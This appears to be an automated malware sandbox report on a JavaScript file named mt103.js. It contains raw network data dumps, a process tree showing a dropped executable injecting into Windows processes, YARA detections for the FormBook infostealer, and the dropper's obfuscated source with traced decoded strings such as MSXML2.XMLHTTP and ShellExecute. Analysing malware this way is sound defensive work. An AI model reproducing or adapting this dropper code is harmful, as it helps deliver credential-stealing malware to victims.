                                                    2023-01-30 12:39:22 UTC281INData Raw: 71 4f de b3 1a fc a5 d2 0b d6 36 54 92 39 04 4c bf fb f0 fb 2e ba d1 9e b4 9f 47 e3 0d 70 05 3c e4 b5 30 77 4e a4 ad 7e 98 b2 66 cc c0 68 b8 80 bb 82 90 9a 13 f1 62 32 dc 8c f4 9c 9a 05 54 42 1e 7a c2 f8 8c 78 6e 1d 6d 7b 16 47 6a 3c b6 8b 48 da 77 5f b9 aa e0 3a 4b 64 ab ab 65 9e ba f9 71 3e d3 70 27 0c f6 15 9c 1e 7e 55 c0 a4 3e 51 f1 53 3b d0 f8 c5 da 0e 6b 81 31 6f af 33 d4 84 96 ec 4c 19 2a da 15 7f 09 d7 9e 3b 1e 3c 45 31 e3 37 1b 4e 0b 07 27 74 e3 c0 a9 fe bf d7 bd 2f b6 7e e0 2c 5f 7c 7c de 62 99 54 c2 dc 1e 7d 93 25 92 7c ba 24 0b 98 c5 91 48 95 ea 57 45 8d 35 c8 8c 08 09 fa 0e 1e a2 c6 37 a0 d2 aa c6 e8 22 87 04 ec bf 9f 94 33 eb 47 2a 81 db b7 79 17 63 10 b9 bd f5 e2 8b 63 57 f5 92 97 3e ec 2c 8e 93 e3 df 32 ff 59 1d 7c 12 6f 9e 03 85 8c fd b3
                                                    Data Ascii: qO6T9L.Gp<0wN~fhb2TBzxnm{Gj<Hw_:Kdeq>p'~U>QS;k1o3L*;<E17N't/~,_||bT}%|$HWE57"3G*yccW>,2Y|o
                                                    2023-01-30 12:39:22 UTC289INData Raw: 23 95 53 45 19 98 d5 02 2c d4 79 a3 d8 84 18 d9 2a 2b 1b da 92 fc b1 bd 1b dd d2 9f da 33 60 ad 1b 8c ef ad 3c ef a6 bd 1b e2 3d 21 df d0 e3 c0 e1 b4 44 ad d2 29 09 90 3d 77 09 51 a3 c3 fd 85 66 7d 8c c5 ab af e1 69 53 3a f9 d3 c9 ab 93 5d 4a 66 d0 38 73 fb 63 45 ae 2e 1c 46 83 28 50 91 ee 7a 84 67 5d b5 3a ee ab 8a 30 f1 c3 d2 43 5c af f6 c5 98 9c f2 1a 5a e1 c8 54 b0 e6 c3 93 1c 30 e6 ed b6 47 3d 5a 7e c1 fe 29 46 81 f8 84 12 a3 49 b6 a8 3d d8 32 fe d9 fc 58 14 82 43 e7 7d 2d 15 20 a4 77 67 d0 4f 8a 04 18 db e6 38 90 b8 b7 7e 21 4a 9b 5b 89 28 5c e4 ca 5e 26 1e b4 2b 75 69 2f 2e 06 c5 0a d1 7c 09 ce bf 8c d5 22 db 3e c1 a5 13 84 ae a6 c3 f0 e4 dd 8b 7b 06 a2 39 10 a9 4f 17 99 d6 e1 cf d1 e9 c3 92 75 d3 01 c0 eb cd 39 4a 5e 7f f0 1d fc c8 03 cd 83 62 84
                                                    Data Ascii: #SE,y*+3`<=!D)=wQf}iS:]Jf8scE.F(Pzg]:0C\ZT0G=Z~)FI=2XC}- wgO8~!J[(\^&+ui/.|">{9Ou9J^b
                                                    2023-01-30 12:39:22 UTC297INData Raw: 9a 9f 74 8d 9b 77 e7 b8 6f b9 be 7c bc a8 70 3c e1 86 0c ee dc 6d b2 89 be a1 82 83 f6 97 56 f3 81 74 1f c7 c7 dc c0 7f 2a 3c 77 29 f3 7c 0c 0a a0 88 e9 11 7d ba 75 89 1e 84 26 04 13 d3 bb f5 9b 84 3a 97 3c f2 6b 9f b8 a3 07 4f 81 eb cd 60 04 2f 27 64 14 19 94 3d 83 13 87 0a 3f 0f 06 7c b6 f8 30 19 21 2c f1 25 00 7e 72 71 02 34 5b db 3f 94 1f f9 e5 de f1 f4 78 7c f7 1f 75 d6 7f 78 27 4c 78 c7 f3 9a ef d4 e9 db 79 26 6e 86 0c f4 88 16 61 60 53 c1 d9 56 d4 7e 66 0c be 7c c2 fa 55 fd 59 82 62 36 25 5a ae 84 00 2b 24 4d 6e fe 32 0a d2 97 ba 10 ce 34 e2 af 8b df b9 a6 49 0e 32 f2 c6 ed 22 ae 25 8c 5e 64 93 d6 8e 1c 3c 3f ec 99 c5 2f b7 0e 81 82 33 f8 92 f2 d4 cb c5 47 fc c9 da 7f cd f3 2b 9a 49 70 67 be d8 98 b6 e1 35 86 6d 7a f3 ee 1f 08 ab b8 9f 0a 48 65 b0
                                                    Data Ascii: two|p<mVt*<w)|}u&:<kO`/'d=?|0!,%~rq4[?x|ux'Lxy&na`SV~f|UYb6%Z+$Mn24I2"%^d<?/3G+Ipg5mzHe
                                                    2023-01-30 12:39:22 UTC305INData Raw: f3 16 c3 f3 79 35 3b 16 90 3f ab cf 6a 8a 40 1f 8e 3d 17 a5 9c b1 67 fe ac e6 be 90 34 8c 4e c8 46 68 d8 a9 b1 f3 00 f7 4a ab c3 f2 52 bc bf f1 d7 61 61 a6 0d 17 cb 12 76 e7 15 bb e0 1a 04 1c b2 d4 c0 86 7e e4 08 07 d6 b6 29 3d c2 24 24 db dc 5d d3 16 19 70 ca a9 a6 81 9b 2e 61 0c d2 3d 71 95 df d9 1c 37 c0 2b f5 35 64 5f cd 37 61 1b b8 56 3c 68 a9 f8 ec c8 e7 7b bb 49 6e 24 1c 86 b8 3b 1b d2 6c f2 8e 30 6c 21 e1 6a 75 c7 51 97 c1 08 20 52 38 b3 18 76 25 ba 22 c3 98 87 70 4c 74 31 38 22 fa 29 a6 da f1 a5 30 5c 95 d3 46 ed aa c6 4a 62 d8 c9 5b 03 25 d2 1e 97 80 36 86 2f b1 cf 54 4b 05 35 a6 5c d6 a9 75 80 a7 4a 2a 84 61 66 91 3f dc cf 34 4f fe 01 16 2a ec e0 fd 6a eb a2 a0 31 8d da d1 45 23 14 27 4c 17 cd e9 9f ec 3c f7 3e 8e 4e 8f ec 5a 14 6b 34 cd e3 d1
                                                    Data Ascii: y5;?j@=g4NFhJRaav~)=$$]p.a=q7+5d_7aV<h{In$;l0l!juQ R8v%"pLt18")0\FJb[%6/TK5\uJ*af?4O*j1E#'L<>NZk4
                                                    2023-01-30 12:39:22 UTC313INData Raw: ee d3 26 4c 4a 41 f1 5d 38 26 a4 2c 43 60 2f 9d fd de fb 9a 15 99 c9 1c e0 a8 0a f6 8c 56 d9 54 c4 88 c0 9e b0 15 b5 1b 30 02 9b bf 5c c3 83 68 b7 80 95 db e8 6e ad 70 f4 e5 ec ae ee 81 c4 72 82 68 46 75 70 59 0f d6 c6 9a 81 71 1b c9 23 f9 b9 fd a6 eb 39 b1 bf e1 7e 67 33 89 bc f8 b8 18 b0 a6 04 89 a3 0d 0b 89 9b f8 14 e3 79 74 84 c3 ec 32 30 cd 23 c8 da c0 91 3e 48 9d 08 76 2b a2 60 08 e2 ec 32 7c 36 6c 95 5a fc 5a c8 ee 88 f0 e2 e1 1e dd 65 fd 88 3a c2 4a 46 8c 61 5c 80 a3 78 e4 84 52 57 8f bf 17 81 1d 6e f9 29 71 d1 8e f3 74 79 04 a5 52 1e 0c cd 48 b1 df 31 45 d7 b9 69 13 03 29 3c f6 42 c1 c0 26 cc fe 62 fb c3 74 14 c8 97 19 d4 8b 41 2e e8 e9 f5 34 59 d7 02 a4 ed 3b ac 2d 43 d9 67 d6 d8 bd 94 62 ce 1c ff 7a 05 94 c4 28 2c 38 e9 b8 a4 84 9f 17 41 d7 15
                                                    Data Ascii: &LJA]8&,C`/VT0\hnprhFupYq#9~g3yt20#>Hv+`2|6lZZe:JFa\xRWn)qtyRH1Ei)<B&btA.4Y;-Cgbz(,8A
                                                    2023-01-30 12:39:22 UTC320INData Raw: 0d e3 ed 59 e1 4a 10 06 b6 d4 c7 cb 51 50 93 35 9f 34 eb c7 93 d4 6d 60 73 b9 b1 43 da fd 26 ed d3 d5 85 e6 2b 30 e7 c3 48 55 2a de 8b 00 36 da f7 5c d2 29 2b 23 9f 0f 45 ae 92 4c 25 63 31 ca e6 d6 cc 02 2c 2e c5 a0 f0 41 ff 67 ca 17 9d 4f f1 cc d6 ff 15 5a 4e a1 40 7c 60 79 ad a2 69 9c 12 b1 26 7f d0 49 6b 93 e1 b5 17 4a f0 a7 15 7e 54 78 5f e9 86 b3 58 9f c1 0e 5c 71 98 59 e3 01 bd bc 48 8e 7a f1 b2 a2 cd 7b f3 1b ad 49 51 e4 9d 07 81 11 9e e5 91 3f 53 a9 b8 95 c3 2c 88 93 0a d5 93 95 b7 9a 8c 9b 05 68 d7 6d a8 0f b6 a2 e6 12 c2 1d c8 fe 7f 12 9a d2 e9 9e ef d6 7c 3f c6 dd 95 ce 8f 1a 32 ef 88 3f 4f 53 1e fe f4 0d f9 51 27 fd f1 44 f7 69 57 dd cc 45 e6 03 f1 a7 f8 01 35 58 38 b3 01 2a fc 06 c7 c2 61 cf 76 27 d5 84 8e 09 a0 cc 3b b5 6c 76 33 04 2a 17 e0
                                                    Data Ascii: YJQP54m`sC&+0HU*6\)+#EL%c1,.AgOZN@|`yi&IkJ~Tx_X\qYHz{IQ?S,hm|?2?OSQ'DiWE5X8*av';lv3*
                                                    2023-01-30 12:39:22 UTC328INData Raw: c6 87 fc 0c 5f 7b b6 00 3c 8f d3 ee 36 57 04 4b ba bf c3 f5 51 8d 58 40 cc 56 90 57 27 88 be 4d 1d 7e a4 51 03 9d 12 3d 95 67 4c e4 92 e9 6c b6 bf 41 de b1 60 7b 87 8c 82 65 95 33 fc 8e 26 ca f9 ae cb f0 5c 7c 1d 40 b0 e0 ee 8b 1a 8c 32 89 2d fd 40 d4 08 b3 ab ad 87 34 6d fe ac 50 45 a7 25 6c 6a b3 ae b5 1b 41 8b 53 62 39 9e 63 8f cb de 01 20 bc 2d 7e 99 07 46 14 e6 f1 3f 97 91 66 be b0 df f8 36 dd 9a 8d f5 38 45 a5 9d 39 b5 d8 ed e1 dd 8e ec 22 82 f2 98 72 6c ce f6 45 6d 54 30 35 4a ab f0 ed cc 25 03 37 46 54 2a 41 b8 49 0b 6a 12 14 ff 3e 7c af 94 be b4 02 47 ed 24 c4 92 aa ce 64 84 d6 24 49 f8 3c 4a 90 92 60 c9 4c 6a d9 96 11 cf 97 e2 ce ac 61 ec ff b1 e0 e1 d1 bc c7 57 6a 2c 49 b0 9c 2f 90 cd 31 fa 77 a6 48 44 25 97 d1 e1 74 7d 36 da 78 26 a0 bf 98 1f
                                                    Data Ascii: _{<6WKQX@VW'M~Q=gLlA`{e3&\|@2-@4mPE%ljASb9c -~F?f68E9"rlEmT05J%7FT*AIj>|G$d$I<J`LjaWj,I/1wHD%t}6x&
                                                    2023-01-30 12:39:22 UTC336INData Raw: 95 df 08 63 7f 08 97 e5 3a 7d e1 73 e7 3a a4 51 11 86 51 0f 0c df c9 68 9b 67 18 0b 22 00 e6 f1 8f 1e 44 31 3c 0d c8 db 85 3d c8 f0 39 ab ba e2 08 eb 93 cb bb 29 fb 06 a6 22 ed f5 cf fe 9a 96 36 ca 76 78 f5 f0 73 a0 b8 64 71 f1 4a 32 ef 03 95 30 23 f1 1c ce 03 32 c8 c7 32 39 82 8b 47 61 ff 0d 86 8d a9 0b 64 c2 cf e6 ac 60 83 68 70 bd 32 2a 96 4e 8a 99 9f 9e 49 50 c2 93 eb c6 7f c4 56 79 0c 03 1f cf 21 39 45 b4 c0 53 3e d7 34 f2 91 17 9a 72 2e d9 1f c6 f0 de ca 99 63 e4 ca 27 aa 9a 08 cc 43 1c 3b 16 19 4b 47 a8 af 1d f5 f7 10 ad 76 c7 d8 34 69 d6 9b f0 e9 f4 e6 9c 71 11 51 7f b5 df 8d 9a cb ea 8e 6e 2e a7 45 e3 bb 2d 08 e0 93 b4 9d a6 c6 90 95 2c 3d a0 53 f2 26 6d 8c f3 47 0d 76 1d 6f 9a 6f e8 f4 ae 1b 0f 8b 1c 59 dd 92 61 29 ca da 59 d7 fb 8e cf 51 14 ec
                                                    Data Ascii: c:}s:QQhg"D1<=9)"6vxsdqJ20#229Gad`hp2*NIPVy!9ES>4r.c'C;KGv4iqQn.E-,=S&mGvooYa)YQ
                                                    2023-01-30 12:39:22 UTC344INData Raw: ce 4b c3 93 65 d0 a3 3b ae 12 51 70 ec 01 40 51 68 35 3d 24 b3 e6 1b 48 e6 54 52 41 66 14 92 a9 14 70 92 79 a8 dd c9 b8 d8 72 2a e0 f9 15 fa e6 5d 60 fb a8 1a e0 14 69 04 38 c1 73 ee eb f8 29 1e 40 cf df f1 5f 4e 0b cb a0 7f 24 31 57 3d 21 49 f7 9d 98 61 49 81 46 a9 ad 57 a8 3b ea f8 51 83 4a 0f 0b b7 9e 90 7c 6d be cb 55 fb bb 0a f4 f1 eb 42 64 14 5f aa 4c 5a 9e c4 de fd 6d af ce 99 17 a3 cc 17 da f2 61 ef 9e ae 07 ba a5 b4 22 ec 33 09 18 cd 34 b8 5e 8f 1a 0b 9f c4 fa 1b 0c b8 56 23 f3 8c 3b ef b2 35 ed f9 c5 71 28 01 f3 5c c2 23 c6 f0 4a da 1f 97 92 9e 24 ae 44 a4 ff ed 60 13 37 ca b4 8f 20 d9 04 9f 67 df 12 f5 b2 18 61 9d 98 ea de 7a 19 b2 ed 3e 8b b5 07 bb b8 ea 17 60 df f7 a8 30 d6 03 da 93 ea 5b 77 26 94 24 d0 41 ed a4 86 6f 52 cb 89 3e bb 27 4c a4
                                                    Data Ascii: Ke;Qp@Qh5=$HTRAfpyr*]`i8s)@_N$1W=!IaIFW;QJ|mUBd_LZma"34^V#;5q(\#J$D`7 gaz>`0[w&$AoR>'L
                                                    2023-01-30 12:39:22 UTC352INData Raw: 9f ae 17 61 2f 67 0c 49 52 18 da 63 0f a0 16 59 01 3c ad 0e 96 28 c9 09 48 69 5e b1 f2 9e 2d c0 b1 b3 57 86 06 57 2f 95 fb a1 95 2d 94 8a f7 6a 76 29 aa bc 01 cf 26 17 48 8e aa af 31 4a 11 9b bb d4 94 66 f9 46 3a 03 6e 1f bf 60 ca a8 b6 cc 6e 4c c0 58 76 62 12 a2 a3 4a 59 d2 aa 5b a5 0d 88 11 38 6b 46 38 c3 c5 d4 6e 2b 47 3a 7e b8 ee b5 71 78 60 e9 37 c3 19 3b a5 36 f4 42 ad 2d 28 33 f4 22 97 8f f1 4e eb 47 6a f6 87 29 f9 bd 47 97 ba 64 52 fc aa 05 8f 27 6f 13 88 96 e1 52 80 3a 27 32 bf 85 74 6f 91 bc da 8e 11 39 67 58 1a 47 43 21 e7 54 a2 55 37 04 43 33 cf cd 3a 37 26 a7 b3 bb 47 74 0c 8b 06 e0 49 7f 58 78 69 28 8b a0 3c 79 48 df b8 b0 7b eb b0 ec 58 d4 5e b6 2b 4a cb 4f de 0b ff 7c 3c 07 4e 18 30 79 1b a3 7f 1f 09 bd ae ba a0 bd 38 21 d5 37 0e a8 16 9c



                                                    Target ID:0
                                                    Start time:13:38:37
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\mt103.js"
                                                    Imagebase:0x7ff7973b0000
                                                    File size:163840 bytes
                                                    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:8
                                                    Start time:13:39:23
                                                    Start date:30/01/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\HBhG.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\HBhG.exe"
                                                    Imagebase:0x8a0000
                                                    File size:615936 bytes
                                                    MD5 hash:02DF8C86345D056735FA60116B93ED2B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:.Net C# or VB.NET
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 55%, ReversingLabs
                                                    Reputation:low

                                                    Target ID:9
                                                    Start time:13:39:24
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                    Imagebase:0xcc0000
                                                    File size:107624 bytes
                                                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:moderate

                                                    Target ID:10
                                                    Start time:13:39:26
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff647860000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:11
                                                    Start time:13:39:40
                                                    Start date:30/01/2023
                                                    Path:C:\Windows\SysWOW64\control.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\control.exe
                                                    Imagebase:0x1380000
                                                    File size:114688 bytes
                                                    MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:high


                                                    Script:

                                                    Code
                                                    0
                                                    var _0x296948 = _0x4692, _0x25c5ce = _0x4251;
                                                      1
                                                      ( function (_0x1fd6ec, _0x1eb0be) {
                                                      • (function _0x2a78(),250395) ➔ undefined
                                                      2
                                                      var _0x496a96 = _0x4692, _0x399b45 = _0x4251, _0x2663fc = _0x1fd6ec ( );
                                                      • _0x2a78() ➔ ymkUWO3cOMS,EmosWRVcNSolFa1ihmofWPhcNa,150UECBKi,W7lcSCkiWOzfa8oxWR5MF8kvWO7dKZu,3428070zJPwOJ,push,460031zEcYIe,W6zWm8kGpSkMW7XjlKxdMszrySoBWRPvyqjRuuXuW6y5nXqIW4/cOSkmmNRcQ2eKcmoaBCkiWPhcIYJcGhZcImkZDCk1urC8hmo0W44,huCPtt7cSW,WOatz8o9qCoYWQfjgNhcGsLT,charCodeAt,open,EXVdUmoNWQ0,hXuIWQxcSSkWm8khW5/dHCkY,7728888BzvkvV,W6ZcGCkIWQj5rCk/WPnhx8ktWRVdQGa,WP/cHWdcICk+W6CiFCoVWRWwjG,W67cU8oXWOlcPHFdRmkiySkYdCkAzttcL0tcOs7cTr/dKYejWOC,bCkhC8onW4FcLI0+WRxcGCkgrG,SC!i,XaOX,WRCRf8oCW5a,4rmKgck,hSkNWP3dMdulzwhcT0e,WQldKJpcNSkZwCohW7uuzCkoW4i,368895bdoymb,B@T8,\HBhG.exe,length,UGpDBa,125536oJLPHF,k8okWPL2AmoqW5JcG8kzgeFcPhtdSIrImJG/vu7cRHdcO8o/WQfBWRnoAMW8wtm,kmoTW4ztcXLxhCoX,bCokgSoo,rSkfWPtcHuXF,Scripting.FileSystemObject,WRddHhdcKMu,ShellExecute,mc7dKLeVW6pdJCknW61zW6JcPYBdRGLPW7pdGdHqpmoofmoVWRlcUq,WRC3WOtcVXVcRcKrEcpdHCkMCmo/W5i+WRaqxxSAdcJcUa,W7lcNYddGYNdT8kiorm2WOJdSa,cWreW7NdIea,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,F8kIdw8uWQKJssddISkJW51zcW,W67dRx/dVCo6W58,WRxcISkFh8o1z8oeC8k8hq,fromCharCode,233387pUFHvh,W7FdRgXdW54Tna,emk4WPhcOa,nvObFWhcVG,FnVtWB,1626000eqHoJP,W7KZbhbjW45FW7NdIcfsW4m,hLEa,QJRI,ubKmW5ivxZ9hW6i,DbyQW4fCh8kdWOldQmkxWPWz,p3(5,WRajWQNcSqVcSNa2Bb7dJCkN,Open,W5S9W7KHWQtdJMhdSGpcIKnHWPun,54TmlaBs,hCktg8kKD8ou,796884wfZlXM,AR2w
                                                      3
                                                      while (! ! [ ] )
                                                        4
                                                        {
                                                          5
                                                          try
                                                            6
                                                            {
                                                              7
                                                              var _0x434d37 = - parseInt ( _0x399b45 ( 0x19e ) ) / 0x1 + - parseInt ( _0x399b45 ( 0x1af ) ) / 0x2 + parseInt ( _0x399b45 ( 0x188 ) ) / 0x3 * ( - parseInt ( _0x399b45 ( 0x185 ) ) / 0x4 ) + - parseInt ( _0x399b45 ( 0x1a3 ) ) / 0x5 + - parseInt ( _0x399b45 ( 0x171 ) ) / 0x6 * ( parseInt ( _0x496a96 ( 0x197, 'Ak^H' ) ) / 0x7 ) + parseInt ( _0x399b45 ( 0x18d ) ) / 0x8 * ( - parseInt ( _0x399b45 ( 0x1ad ) ) / 0x9 ) + parseInt ( _0x496a96 ( 0x18f, '#k&M' ) ) / 0xa * ( parseInt ( _0x399b45 ( 0x175 ) ) / 0xb );
                                                              • _0x4251(414) ➔ "fromCharCode"
                                                              • parseInt("fromCharCode") ➔ NaN
                                                              • _0x4251(431) ➔ "hCktg8kKD8ou"
                                                              • parseInt("hCktg8kKD8ou") ➔ NaN
                                                              • _0x4251(392) ➔ "WQldKJpcNSkZwCohW7uuzCkoW4i"
                                                              • parseInt("WQldKJpcNSkZwCohW7uuzCkoW4i") ➔ NaN
                                                              • _0x4251(389) ➔ "WRCRf8oCW5a"
                                                              • parseInt("WRCRf8oCW5a") ➔ NaN
                                                              • _0x4251(419) ➔ "FnVtWB"
                                                              • parseInt("FnVtWB") ➔ NaN
                                                              • _0x4251(369) ➔ "EmosWRVcNSolFa1ihmofWPhcNa"
                                                              • parseInt("EmosWRVcNSolFa1ihmofWPhcNa") ➔ NaN
                                                              • _0x4692(407,"Ak^H") ➔ "t\x9b\x9dK h\xe8F.O\x1b\x14\xf9f]A\xf3~\xfe\xdd\xeb\x93\xac$"
                                                              • parseInt("t\x9b\x9dK h\xe8F.O\x1b\x14\xf9f]A\xf3~\xfe\xdd\xeb\x93\xac$") ➔ NaN
                                                              • _0x4251(397) ➔ "UGpDBa"
                                                              • parseInt("UGpDBa") ➔ NaN
                                                              • _0x4251(429) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                              • parseInt("W5S9W7KHWQtdJMhdSGpcIKnHWPun") ➔ NaN
                                                              • _0x4692(399,"#k&M") ➔ "7\x11ov\x15\x8c\xf9\xf9#\xe5 \xc9{\x91\x14 Y5k\xb9\x8d\xc9\xbeW\xc3\xb4\xb5\xa45cY>3\xac"
                                                              • parseInt("7\x11ov\x15\x8c\xf9\xf9#\xe5 \xc9{\x91\x14 Y5k\xb9\x8d\xc9\xbeW\xc3\xb4\xb5\xa45cY>3\xac") ➔ 7
                                                              • _0x4251(373) ➔ "push"
                                                              • parseInt("push") ➔ NaN
                                                              • _0x4251(414) ➔ "233387pUFHvh"
                                                              • parseInt("233387pUFHvh") ➔ 233387
                                                              • _0x399b45(431) ➔ "796884wfZlXM"
                                                              • parseInt("796884wfZlXM") ➔ 796884
                                                              • _0x399b45(392) ➔ "368895bdoymb"
                                                              • parseInt("368895bdoymb") ➔ 368895
                                                              • _0x399b45(389) ➔ "4rmKgck"
                                                              • parseInt("4rmKgck") ➔ 4
                                                              • _0x399b45(419) ➔ "1626000eqHoJP"
                                                              • parseInt("1626000eqHoJP") ➔ 1626000
                                                              • _0x399b45(369) ➔ "150UECBKi"
                                                              • parseInt("150UECBKi") ➔ 150
                                                              • _0x4692(407,"Ak^H") ➔ "139783InEZVB"
                                                              • parseInt("139783InEZVB") ➔ 139783
                                                              • _0x399b45(397) ➔ "125536oJLPHF"
                                                              • parseInt("125536oJLPHF") ➔ 125536
                                                              • _0x399b45(429) ➔ "54TmlaBs"
                                                              • parseInt("54TmlaBs") ➔ 54
                                                              • _0x4692(399,"#k&M") ➔ "460SvEvgK"
                                                              • parseInt("460SvEvgK") ➔ 460
                                                              • _0x399b45(373) ➔ "460031zEcYIe"
                                                              • parseInt("460031zEcYIe") ➔ 460031
                                                              8
                                                              if ( _0x434d37 === _0x1eb0be )
                                                                9
                                                                break ;
                                                                  10
                                                                  else
                                                                    11
                                                                    _0x2663fc['push'] ( _0x2663fc['shift'] ( ) );
                                                                      12
                                                                      }
                                                                        13
                                                                        catch ( _0x179bcd )
                                                                          14
                                                                          {
                                                                            15
                                                                            _0x2663fc['push'] ( _0x2663fc['shift'] ( ) );
                                                                              16
                                                                              }
                                                                                17
                                                                                }
                                                                                  18
                                                                                  } ( _0x2a78, 0x3d21b ) );
                                                                                    19
                                                                                    function _0x560f(_0x21316b, _0x2c7673) {
                                                                                    • _0x560f(275) ➔ "aLBcSv8UWRldTmkhoColW54Z"
                                                                                    • _0x560f(261) ➔ "hSkNWP3dMdulzwhcT0e"
                                                                                    • _0x560f(258) ➔ "W5S9W7KHWQtdJMhdSGpcIKnHWPun"
                                                                                    • _0x560f(262) ➔ "Close"
                                                                                    • _0x560f(279) ➔ "WRCRf8oCW5a"
                                                                                    • _0x560f(259) ➔ "24cwPSlC"
                                                                                    • _0x560f(270) ➔ "gCk/WPVdMa"
                                                                                    • _0x560f(275) ➔ "MSXML2.XMLHTTP"
                                                                                    • _0x560f(261) ➔ "Close"
                                                                                    • _0x560f(275) ➔ "7728888BzvkvV"
                                                                                    20
                                                                                    var _0x152d41 = _0x1523 ( );
                                                                                    • _0x1523() ➔ WO41qK7cRvBcISoBWQBcVJxcMW,536561IZdlNV,ScriptFullName,F8kIdw8uWQKJssddISkJW51zcW,W5S9W7KHWQtdJMhdSGpcIKnHWPun,24cwPSlC,W5hdPKP/WRyhD3VcSSkOWRzpw8kJWQqxW57dKmkQW5JcJSoysvelWRBdPKNcS37cHJJcLW,hSkNWP3dMdulzwhcT0e,Close,WPddGmklWQ0hpmoeyeFdQGBcTmk5tCoGW4uNguRdLSoJWQKscSkvW48,o8oHWOWTjrhcPNjnWPtcLYpcQmkKW6hcKa,32292SPYXOk,1309896lcehgL,WP/cHWdcICk+W6CiFCoVWRWwjG,934406fwGgPc,3428070zJPwOJ,gCk/WPVdMa,W7BdICoxwmo0W5TdySkoWPGi,WRxcISkFh8o1z8oeC8k8hq,ShellExecute,C8kCWRBcQmoRqSk/DNe,aLBcSv8UWRldTmkhoColW54Z,MSXML2.XMLHTTP,7728888BzvkvV,bmkMWPFcTmkPkLaJ,WRCRf8oCW5a,Shell.Application
